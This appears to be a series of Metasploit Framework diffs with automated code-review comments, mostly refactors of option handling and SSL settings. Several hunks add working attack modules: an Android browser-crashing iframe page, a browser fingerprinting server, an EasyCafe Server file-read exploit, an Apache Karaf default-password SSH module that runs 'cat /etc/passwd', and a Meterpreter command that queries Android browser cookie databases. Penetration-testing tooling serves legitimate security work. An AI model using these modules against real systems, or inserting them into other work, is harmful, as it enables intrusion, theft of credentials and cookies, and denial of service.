@@info ||= load_root
svnt = @@info[:updated]
if(not svnt)
return
end
begin
Date.parse(@@info[:updated])
rescue ArgumentError
end
end
end
end
end


@ -295,6 +295,33 @@ class Android < Extension
end
networks
end
def sqlite_query(dbname, query, writeable)
request = Packet.create_request('sqlite_query')
request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname)
request.add_tlv(TLV_TYPE_SQLITE_QUERY, query)
request.add_tlv(TLV_TYPE_SQLITE_WRITE, writeable)
response = client.send_request(request, 30)
error_msg = response.get_tlv(TLV_TYPE_SQLITE_ERROR)
raise "SQLiteException: #{error_msg.value}" if error_msg
unless writeable
result = {
columns: [],
rows: []
}
data = response.get_tlv(TLV_TYPE_SQLITE_RESULT_GROUP)
unless data.nil?
columns = data.get_tlv(TLV_TYPE_SQLITE_RESULT_COLS)
result[:columns] = columns.get_tlv_values(TLV_TYPE_SQLITE_VALUE)
data.each(TLV_TYPE_SQLITE_RESULT_ROW) do |row|
result[:rows] << row.get_tlv_values(TLV_TYPE_SQLITE_VALUE)
end
end
result
end
end
end
end
end
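Review bot: `sqlite_query` raises a bare string (a RuntimeError) for database-side errors, so a caller cannot tell an SQLite failure from any other exception; a small class in this extension, `class SqliteError < RuntimeError; end`, with `raise SqliteError, error_msg.value`, lets the console command rescue just that case. `columns.get_tlv_values(...)` is also called without checking that `TLV_TYPE_SQLITE_RESULT_COLS` was present in the group; if the Android side can return a result group without a column list for an empty result (not visible here) that is a NoMethodError on nil, and `result[:columns] = columns ? columns.get_tlv_values(TLV_TYPE_SQLITE_VALUE) : []` guards it. A YARD header should state that the return value is nil when `writeable` is true, since the `unless` is the method's last expression.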


@ -81,6 +81,15 @@ TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS
TLV_TYPE_ACTIVITY_START_RESULT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9102)
TLV_TYPE_ACTIVITY_START_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9103)
TLV_TYPE_SQLITE_RESULT_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9080)
TLV_TYPE_SQLITE_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9081)
TLV_TYPE_SQLITE_QUERY = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9082)
TLV_TYPE_SQLITE_RESULT_COLS = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9083)
TLV_TYPE_SQLITE_RESULT_ROW = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9084)
TLV_TYPE_SQLITE_VALUE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9085)
TLV_TYPE_SQLITE_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9086)
TLV_TYPE_SQLITE_WRITE = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9087)
TLV_TYPE_WALLPAPER_DATA = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 9201)
end


@ -31,6 +31,7 @@ class Console::CommandDispatcher::Android
'wlan_geolocate' => 'Get current lat-long using WLAN information',
'interval_collect' => 'Manage interval collection capabilities',
'activity_start' => 'Start an Android activity from a Uri string',
'sqlite_query' => 'Query a SQLite database from storage',
'set_audio_mode' => 'Set Ringer Mode'
}
@ -45,6 +46,7 @@ class Console::CommandDispatcher::Android
'wlan_geolocate' => ['wlan_geolocate'],
'interval_collect' => ['interval_collect'],
'activity_start' => ['activity_start'],
'sqlite_query' => ['sqlite_query'],
'set_audio_mode' => ['set_audio_mode']
}
@ -189,7 +191,7 @@ class Console::CommandDispatcher::Android
path = "sms_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
dump_sms_opts = Rex::Parser::Arguments.new(
'-h' => [ false, 'Help Banner' ],
'-o' => [ false, 'Output path for sms list']
'-o' => [ true, 'Output path for sms list']
)
dump_sms_opts.parse(args) do |opt, _idx, val|
@ -277,7 +279,7 @@ class Console::CommandDispatcher::Android
dump_contacts_opts = Rex::Parser::Arguments.new(
'-h' => [ false, 'Help Banner' ],
'-o' => [ false, 'Output path for contacts list']
'-o' => [ true, 'Output path for contacts list']
)
dump_contacts_opts.parse(args) do |opt, _idx, val|
@ -381,7 +383,7 @@ class Console::CommandDispatcher::Android
dump_calllog_opts = Rex::Parser::Arguments.new(
'-h' => [ false, 'Help Banner' ],
'-o' => [ false, 'Output path for call log']
'-o' => [ true, 'Output path for call log']
)
@ -578,6 +580,55 @@ class Console::CommandDispatcher::Android
end
end
def cmd_sqlite_query(*args)
sqlite_query_opts = Rex::Parser::Arguments.new(
'-h' => [ false, 'Help Banner' ],
'-d' => [ true, 'The sqlite database file'],
'-q' => [ true, 'The sqlite statement to execute'],
'-w' => [ false, 'Open the database in writable mode (for INSERT/UPDATE statements)']
)
writeable = false
database = ''
query = ''
sqlite_query_opts.parse(args) do |opt, _idx, val|
case opt
when '-h'
print_line("Usage: sqlite_query -d <database_file> -q <statement>\n")
print_line(sqlite_query_opts.usage)
return
when '-d'
database = val
when '-q'
query = val
when '-w'
writeable = true
end
end
if database.blank? || query.blank?
print_error("You must enter both a database files and a query")
print_error("e.g. sqlite_query -d /data/data/com.android.browser/databases/webviewCookiesChromium.db -q 'SELECT * from cookies'")
print_line(sqlite_query_opts.usage)
return
end
result = client.android.sqlite_query(database, query, writeable)
unless writeable
header = "#{query} on database file #{database}"
table = Rex::Ui::Text::Table.new(
'Header' => header,
'Columns' => result[:columns],
'Indent' => 0
)
result[:rows].each do |e|
table << e
end
print_line
print_line(table.to_s)
end
end
#
# Name for this dispatcher
#
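Review bot: `cmd_sqlite_query` gives no feedback in `-w` mode: when `writeable` is true the result is discarded and nothing is printed, so the user cannot tell whether the INSERT/UPDATE ran, and a SELECT issued with `-w` silently loses its rows. Add an `else` branch with `print_good("Query executed on #{database}")` and extend the `-w` help text to say that no result set is returned in that mode. The error message `"You must enter both a database files and a query"` should read `"a database file"`. Making `-o` require an argument in the three dump commands looks correct.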


@ -65,7 +65,7 @@ begin
when 'SSL2', :SSLv2
version = :SSLv2
# 'TLS' will be the new name for autonegotation with newer versions of OpenSSL
when 'SSL23', :SSLv23, 'TLS'
when 'SSL23', :SSLv23, 'TLS', 'Auto'
version = :SSLv23
when 'SSL3', :SSLv3
version = :SSLv3
@ -124,6 +124,11 @@ begin
# Tie the context to a socket
self.sslsock = OpenSSL::SSL::SSLSocket.new(self, self.sslctx)
# If peerhost looks like a hostname, set the undocumented 'hostname'
# attribute on sslsock, which enables the Server Name Indication (SNI)
# extension
self.sslsock.hostname = self.peerhost if !Rex::Socket.dotted_ip?(self.peerhost)
# Force a negotiation timeout
begin
Timeout.timeout(params.timeout) do
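Review bot: The SNI guard `self.sslsock.hostname = self.peerhost if !Rex::Socket.dotted_ip?(self.peerhost)` only excludes dotted-quad IPv4 literals, so a bare or bracketed IPv6 peerhost would be sent as the SNI server name, which RFC 6066 forbids for IP literals and which some servers answer with a fatal alert. If `dotted_ip?` does not also recognise IPv6 (its definition is outside this diff), widen the condition to skip IPv6 literals and a nil peerhost as well, e.g. `self.sslsock.hostname = self.peerhost if self.peerhost && !Rex::Socket.dotted_ip?(self.peerhost) && !self.peerhost.include?(':')`. The comment calling `hostname` an undocumented attribute also looks stale: `OpenSSL::SSL::SSLSocket#hostname=` is, as far as I can tell, a documented accessor in Ruby's openssl extension, so `# Set the SNI server name when peerhost is a host name rather than an IP literal` would be more accurate. The enclosing method starts before this hunk and continues after it.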

@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model', '1.1.0'
# Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.1.2'
spec.add_runtime_dependency 'metasploit-payloads', '1.1.3'
# Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack'
# get list of network interfaces, like eth* from OS.

@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
def run
print_status("Running MS SQL Server Enumeration...")
if mssql_login_datastore == false
if !mssql_login_datastore
print_error("Login was unsuccessful. Check your credentials.")
disconnect
return

@ -38,7 +38,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptString.new('KEYWORDS', [ true, 'Keywords to search for','passw|credit|card']),
OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', '1']),
OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', 1]),
], self.class)
end

@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
OptString.new('VSCPATH', [false, 'The path to the target Volume Shadow Copy', '']),
OptString.new('WINPATH', [true, 'The name of the Windows directory (examples: WINDOWS, WINNT)', 'WINDOWS']),
OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', 'false']),
OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', false]),
], self.class)
end
@ -69,7 +69,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("Attempting to copy NTDS.dit from #{datastore['VSCPATH']}")
vscpath = datastore['VSCPATH']
else
unless datastore['CREATE_NEW_VSC'] == true
unless datastore['CREATE_NEW_VSC']
vscpath = check_vss(text, bat)
end
unless vscpath

@ -0,0 +1,62 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => "Android Stock Browser Iframe DOS",
'Description' => %q(
This module exploits a vulnerability in the native browser that comes with Android 4.0.3.
If successful, the browser will crash after viewing the webpage.
),
'License' => MSF_LICENSE,
'Author' => [
'Jean Pascal Pereira', # Original exploit discovery
'Jonathan Waggoner' # Metasploit module
],
'References' => [
[ 'PACKETSTORM', '118539'],
[ 'CVE', '2012-6301' ]
],
'DisclosureDate' => "Dec 1 2012",
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end
def run
exploit # start http server
end
def setup
@html = %|
<html>
<body>
<script type="text/javascript">
for (var i = 0; i < 600; i++)
{
var m_frame = document.createElement("iframe");
m_frame.setAttribute("src", "market://#{Rex::Text.rand_text_alpha(rand(16) + 1)}");
document.body.appendChild(m_frame);
}
</script>
</body>
</html>
|
end
def on_request_uri(cli, _request)
print_status('Sending response')
send_response(cli, @html)
end
end
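Review bot: `on_request_uri` logs `Sending response` without identifying the client, which makes a passive server that may be hit by many devices hard to attribute in the console; `print_status("#{cli.peerhost} - Sending response")` follows the convention the other browser-facing modules in this commit use. The iframe count of 600 and the `market://` scheme are hard-coded in `setup` with no explanation; a one-line comment stating where the 600 figure comes from (the referenced PoC, presumably) would remove the magic number, or it could be exposed as an `OptInt` for devices that need more or fewer frames. Both are style points; the module otherwise does what its description says.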

@ -7,6 +7,9 @@ require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
include Msf::Module::Deprecated
deprecated(Date.new(2016, 4, 23), 'auxiliary/dos/android/android_stock_browser_iframe')
def initialize(info = {})
super(

@ -37,7 +37,6 @@ class MetasploitModule < Msf::Auxiliary
'DefaultOptions' =>
{
'SSL' => true,
'SSLVersion' => 'TLS1',
'RPORT' => 443
}
))

@ -28,6 +28,9 @@ class MetasploitModule < Msf::Auxiliary
[ 'MSB', 'MS09-065' ],
[ 'OSVDB', '59869']
],
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer',
'DisclosureDate' => 'Nov 10 2009'
))
register_options([

@ -538,7 +538,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("Done fuzzing fields in form #{thisform[:name].upcase.strip}")
end
# fuzz headers ?
if datastore['FUZZHEADERS'] == true
if datastore['FUZZHEADERS']
print_status("Fuzzing header fields")
do_fuzz_headers(thisform,response.headers)
end

@ -9,6 +9,9 @@ require 'net/ssh'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Module::Deprecated
deprecated(Date.new(2016, 4, 14), 'auxiliary/scanner/ssh/apache_karaf_command_execution')
def initialize(info={})
super(update_info(info,
@ -130,4 +133,4 @@ class MetasploitModule < Msf::Auxiliary
end
end
end
end
end

@ -172,7 +172,7 @@ class MetasploitModule < Msf::Auxiliary
# set.
#
def use_zlib
unless Rex::Text.zlib_present? || datastore['HTTP::compression'] == false
unless Rex::Text.zlib_present? || !datastore['HTTP::compression']
fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
end
end

@ -0,0 +1,85 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "HTTP Client Information Gather",
'Description' => %q{
This module gathers information about a browser that exploits might be interested in, such
as OS name, browser version, plugins, etc. By default, the module will return a fake 404,
but you can customize this output by changing the Custom404 datastore option, and
redirect to an external web page.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'DisclosureDate' => "Mar 22 2016",
'Actions' =>
[
[
'WebServer', {
'Description' => 'A web that collects information about the browser.'
}]
],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
))
end
def is_key_wanted?(key)
![:module, :created_at, :tried, :vuln_test, :address].include?(key)
end
def is_value_wanted?(value)
!(value.nil? || value =~ /^undefined|false/ || !value)
end
def ignore_items!(target_info)
target_info.delete_if do |key, value|
!is_key_wanted?(key) || !is_value_wanted?(value)
end
end
def report_host_info(target_info)
opts = { host: target_info[:address] }
opts.merge!(target_info)
report_host(opts)
end
def translate_script_meaning(value)
case value
when 'script'
'Browser allows JavaScript'
when 'headers'
'Browser does not allow JavaScript'
end
end
def print_target_info(cli, target_info)
print_status("#{cli.peerhost} - We have found the following interesting information:")
report_host_info(target_info)
ignore_items!(target_info)
target_info.each_pair do |key, value|
if key == :source
value = translate_script_meaning(value)
end
print_status("#{cli.peerhost} - #{key} = #{value}")
end
end
def on_request_exploit(cli, req, target_info)
print_target_info(cli, target_info)
send_not_found(cli)
end
def run
exploit
end
end
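Review bot: In `is_value_wanted?` the pattern `/^undefined|false/` parses as `^undefined` OR `false`-anywhere, so any value that merely contains "false" mid-string (a plugin name, a user-agent fragment) is silently dropped, and `^` matches at the start of any line rather than the whole value; `value =~` will also fail once a value is not a String, since `Object#=~` is deprecated and later removed. If values are whole tokens, anchor it and restrict it to strings: `!(value.nil? || !value || (value.is_a?(String) && value =~ /\A(?:undefined|false)\z/))`. Note also that `print_target_info` calls `report_host_info` before `ignore_items!`, so the unfiltered hash, including the `:module`, `:tried` and `:vuln_test` bookkeeping keys, is what reaches `report_host`; if that is unintended, filter a copy first or swap the two calls.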

@ -32,7 +32,6 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'SSLVersion' => 'TLS1',
'SSL' => true
}
))

@ -286,7 +286,7 @@ class MetasploitModule < Msf::Auxiliary
# set.
#
def use_zlib
if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
if !Rex::Text.zlib_present? && datastore['HTTP::compression']
fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
end
end

@ -31,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
name = name.to_s.camelize(:lower)
uri = api_path + name
cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS1')
cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS')
cli.connect
req = cli.request_cgi({
'uri' => uri,
@ -430,16 +430,15 @@ class MetasploitModule < Msf::Auxiliary
{
'RPORT' => 443,
'SSL' => true,
'SSLVersion' => 'TLS1'
}
))
register_options(
[
OptString.new('HOSTNAME', [true, 'The target hostname']),
OptInt.new('DELAY', [true, 'The delay in seconds between API requests', 5]),
OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', 'true']),
OptBool.new('GRADE', [true, 'Output only the hostname: grade', 'false']),
OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', 'true'])
OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', true]),
OptBool.new('GRADE', [true, 'Output only the hostname: grade', false]),
OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', true])
], self.class)
end

@ -30,7 +30,6 @@ class MetasploitModule < Msf::Auxiliary
'DefaultOptions' =>
{
'SSL' => true,
'SSLVersion' => 'TLS1'
}
)

@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary
'DefaultOptions' =>
{
'SSL' => true,
'SSLVersion' => 'TLS1',
'RPORT' => 443
}
))

@ -30,7 +30,6 @@ class MetasploitModule < Msf::Auxiliary
{
'SSL' => true,
'RPORT' => 443,
'SSLVersion' => 'SSL3'
},
'References' =>
[
@ -43,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptEnum.new('SSLVersion', [true, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']])
Opt::SSLVersion
]
)
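Review bot: Replacing the module-local `OptEnum.new('SSLVersion', ... 'SSL3' ...)` with `Opt::SSLVersion` and dropping the `'SSLVersion' => 'SSL3'` default changes the protocol this module negotiates from a pinned SSL3 to whatever `Opt::SSLVersion` defaults to (presumably the new `Auto` alias mapped to SSLv23 elsewhere in this commit). If the check logic outside this hunk expects records for a specific protocol version, an auto-negotiated TLS session may not exercise the same code path, so this is worth a run against a known-affected host before merging. A one-line comment near `register_options`, e.g. `# Protocol version follows the framework default (Auto) rather than a pinned SSL3`, would record that the default change is deliberate. The `initialize` method enclosing both hunks starts outside this section.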

@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary
{
'RPORT' => 443,
'SSL' => true,
'SSLVersion' => 'TLS1'
}
))
end

@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptBool.new('STORE_NOTES', [ true, 'Store the captured information in notes. Use "notes -t http.title" to view', true ]),
OptBool.new('SHOW_ERRORS', [ true, 'Show error messages relating to grabbing titles on the console', true ]),
OptBool.new('SHOW_TITLES', [ true, 'Show the titles on the console as they are grabbed', true ]),
OptString.new('TARGETURI', [true, 'The base path', '/'])
], self.class)
@ -35,8 +34,8 @@ class MetasploitModule < Msf::Auxiliary
end
def run
if datastore['STORE_NOTES'] == false && datastore['SHOW_ERRORS'] == false && datastore['SHOW_TITLES'] == false
print_error("Notes storage is false, errors have been turned off and titles are not being shown on the console. There isn't much point in running this module.")
if !datastore['STORE_NOTES'] && !datastore['SHOW_TITLES']
print_error("Notes storage is false and titles are not being shown on the console. There isn't much point in running this module.")
else
super
end
@ -51,7 +50,7 @@ class MetasploitModule < Msf::Auxiliary
# If no response, quit now
if res.nil?
print_error("[#{target_host}:#{rport}] No response") if datastore['SHOW_ERRORS'] == true
vprint_error("[#{target_host}:#{rport}] No response")
return
end
@ -65,12 +64,12 @@ class MetasploitModule < Msf::Auxiliary
server_header = val if key.downcase == 'server'
end
else
print_error("[#{target_host}:#{rport}] No HTTP headers") if datastore['SHOW_ERRORS'] == true
vprint_error("[#{target_host}:#{rport}] No HTTP headers")
end
# If the body is blank, just stop now as there is no chance of a title
if res.body.nil?
print_error("[#{target_host}:#{rport}] No webpage body") if datastore['SHOW_ERRORS'] == true
vprint_error("[#{target_host}:#{rport}] No webpage body")
return
end
@ -78,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary
# there is no chance that we will have a title
rx = %r{<title>[\n\t\s]*(?<title>.+?)[\s\n\t]*</title>}im.match(res.body.to_s)
unless rx
print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true
vprint_error("[#{target_host}:#{rport}] No webpage title")
return
end
@ -86,13 +85,15 @@ class MetasploitModule < Msf::Auxiliary
rx[:title].strip!
if rx[:title] != ''
rx_title = Rex::Text.html_decode(rx[:title])
print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}") if datastore['SHOW_TITLES'] == true
if datastore['STORE_NOTES'] == true
if datastore['SHOW_TITLES']
print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}")
end
if datastore['STORE_NOTES']
notedata = { code: res.code, port: rport, server: server_header, title: rx_title, redirect: location_header, uri: datastore['TARGETURI'] }
report_note(host: target_host, port: rport, type: "http.title", data: notedata, update: :unique_data)
end
else
print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true
vprint_error("[#{target_host}:#{rport}] No webpage title")
end
end

@ -83,7 +83,7 @@ class MetasploitModule < Msf::Auxiliary
loot = store_loot("tplink.traversal.data","text/plain",rhost, res.body,file)
vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}")
if datastore['VERBOSE'] == true
if datastore['VERBOSE']
vprint_good("#{rhost}:#{rport} - Response - File #{file}:")
res.body.each_line do |line|
# the following is the last line of the useless response
@ -108,7 +108,7 @@ class MetasploitModule < Msf::Auxiliary
end
out = false
end
elsif (res and res.code)
elsif res && res.code
vprint_error("#{rhost}:#{rport} - File->#{file} not found")
end
end

@ -0,0 +1,97 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'EasyCafe Server Remote File Access',
'Description' => %q{
This module exploits a file retrieval vulnerability in
EasyCafe Server. The vulnerability can be triggered by
sending a specially crafted packet (opcode 0x43) to the
831/TCP port.
This module has been successfully tested on EasyCafe Server
version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3
and Windows 7 SP1.
Note that the server will throw a popup messagebox if the
specified file does not exist.
},
'License' => MSF_LICENSE,
'Author' =>
[
'R-73eN', # Vulnerability Discovery
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
],
'References' =>
[
[ 'EDB', '39102' ]
]
))
register_options(
[
Opt::RPORT(831),
OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts'])
], self.class)
end
def get_file
res = sock.get_once
unless res
print_error("Unable to retrieve file due to a timeout.")
return
end
unless res.length == 261
print_error("Received a response of an invalid size.")
return
end
file_size = res.unpack('@256V')[0]
contents = ''
while contents.length < file_size
contents << sock.get_once
end
print_status("File retrieved successfully (#{contents.length} bytes)!")
contents
end
def run_host(ip)
file_path = datastore['FILEPATH']
if file_path.length > 67
print_error("File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.")
return
end
packet = "\x43"
packet << file_path
packet << "\x00" * (255 - file_path.length)
packet << "\x01\x00\x00\x00\x01"
vprint_status("Sending request (#{packet.length} bytes)")
connect
sock.put(packet)
contents = get_file
disconnect
return if contents.nil?
path = store_loot(
'easycafe_server',
'application/octet-stream',
ip,
contents,
File.basename(file_path)
)
print_status("File saved in: #{path}")
end
end
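Review bot: In `get_file` the read loop `while contents.length < file_size; contents << sock.get_once; end` trusts a length taken from the peer (`res.unpack('@256V')`) and never checks the result of `sock.get_once`, so a timeout or a server that stops sending turns into a `TypeError` on `nil`, and a hostile or buggy server advertising a multi-gigabyte size keeps the scanner buffering into memory until the read finally fails. Bound the loop on a nil or empty read, cap the accepted size, and report a short read rather than printing success; the whole method is visible so the change is local. The cap can be a class constant as below or an `OptInt` if operators need to adjust it.

```ruby
  # The server-supplied length is untrusted: refuse absurd sizes before buffering.
  MAX_FILE_SIZE = 10 * 1024 * 1024

  def get_file
    # … unchanged: initial 261-byte response checks …
    file_size = res.unpack('@256V')[0]
    if file_size > MAX_FILE_SIZE
      print_error("Server reported #{file_size} bytes, above the #{MAX_FILE_SIZE} byte limit.")
      return
    end
    contents = ''
    while contents.length < file_size
      chunk = sock.get_once
      break if chunk.nil? || chunk.empty?
      contents << chunk
    end
    if contents.length < file_size
      print_error("Short read: received #{contents.length} of #{file_size} bytes.")
      return
    end
    print_status("File retrieved successfully (#{contents.length} bytes)!")
    contents
  end
```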

@ -30,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
def run_host(ip)
if (not mssql_login_datastore)
if !mssql_login_datastore
print_error("#{rhost}:#{rport} - Invalid SQL Server credentials")
return
end

@ -35,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
def run_host(ip)
if (not mssql_login_datastore)
if !mssql_login_datastore
print_error("#{rhost}:#{rport} - Invalid SQL Server credentials")
return
end

@ -25,7 +25,6 @@ class MetasploitModule < Msf::Auxiliary
'DefaultOptions' =>
{
'SSL' => true,
'SSLVersion' => 'TLS1'
}
))
register_options(

@ -37,12 +37,12 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptInt.new('RETRY', [false, "Number of tries to query the NTP server", 3]),
OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', 'false'])
OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', false])
], self.class)
register_advanced_options(
[
OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', 'false'])
OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', false])
], self.class)
end

@ -36,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ])
OptPort.new('RPORT', [ true, 'Remote port running RDP', 3389 ])
], self.class)
end

@ -408,7 +408,7 @@ class MetasploitModule < Msf::Auxiliary
end
subdirs.shift
end
print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles'] == true
print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles']
end
unless detailed_tbl.rows.empty?
if datastore['LogSpider'] == '1'

@ -0,0 +1,133 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => "Apache Karaf Default Credentials Command Execution",
'Description' => %q{
This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x.
The 'karaf' user has a known default password, which can be used to login to the
SSH service, and execute operating system commands from remote.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nicholas Starke <nick@alephvoid.com>'
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
['Apache Karaf', {}],
],
'Privileged' => true,
'DisclosureDate' => "Feb 9 2016",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8101),
OptString.new('USERNAME', [true, 'Username', 'karaf']),
OptString.new('PASSWORD', [true, 'Password', 'karaf']),
OptString.new('CMD', [true, 'Command to Run', 'cat /etc/passwd'])
], self.class
)
register_advanced_options(
[
Opt::Proxies,
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
def rport
datastore['RPORT']
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def cmd
datastore['CMD']
end
def do_login(user, pass, ip)
opts = {
:auth_methods => ['password'],
:msframework => framework,
:msfmodule => self,
:port => rport,
:disable_agent => true,
:config => false,
:password => pass,
:record_auth_info => true,
:proxies => datastore['Proxies']
}
opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(ip, user, opts)
end
rescue OpenSSL::Cipher::CipherError => e
print_error("#{ip}:#{rport} SSH - Unable to connect to this Apache Karaf (#{e.message})")
return
rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{ip}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{ip}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{ip}:#{rport} SSH - Failed authentication"
rescue Net::SSH::Exception => e
print_error "#{ip}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end
if ssh
print_good("#{ip}:#{rport}- Login Successful with '#{user}:#{pass}'")
else
print_error "#{ip}:#{rport} - Unknown error"
end
ssh
end
def run_host(ip)
print_status("#{ip}:#{rport} - Attempt to login...")
ssh = do_login(username, password, ip)
if ssh
output = ssh.exec!("shell:exec #{cmd}\n").to_s
if output
print_good("#{ip}:#{rport} - Command successfully executed. Output: #{output}")
store_loot("apache.karaf.command",
"text/plain",
ip,
output)
vprint_status("#{ip}:#{rport} - Loot stored at: apache.karaf.command")
else
print_error "#{ip}:#{rport} - Command failed to execute"
end
end
end
end
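Review bot: In `do_login` the `rescue Net::SSH::AuthenticationFailed` branch prints a failure but, unlike every other rescue in the chain, does not `return`, so control falls through to the `if ssh ... else print_error "Unknown error"` tail and the user sees two messages for one bad password; add `return` after the `Failed authentication` print. In `run_host`, the path returned by `store_loot` is discarded and the status line prints the literal loot type, so capture it and print `vprint_status("#{ip}:#{rport} - Loot stored at: #{loot_path}")` instead, and the session opened by `Net::SSH.start` is never closed after `exec!`, so add `ssh.close` in an `ensure` once the output has been read. The `Targets`, `Privileged`, `DefaultTarget`, `Platform` and `Arch` keys are exploit-module metadata that an `Msf::Auxiliary` scanner does not consume, as far as I can tell, and can be dropped.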

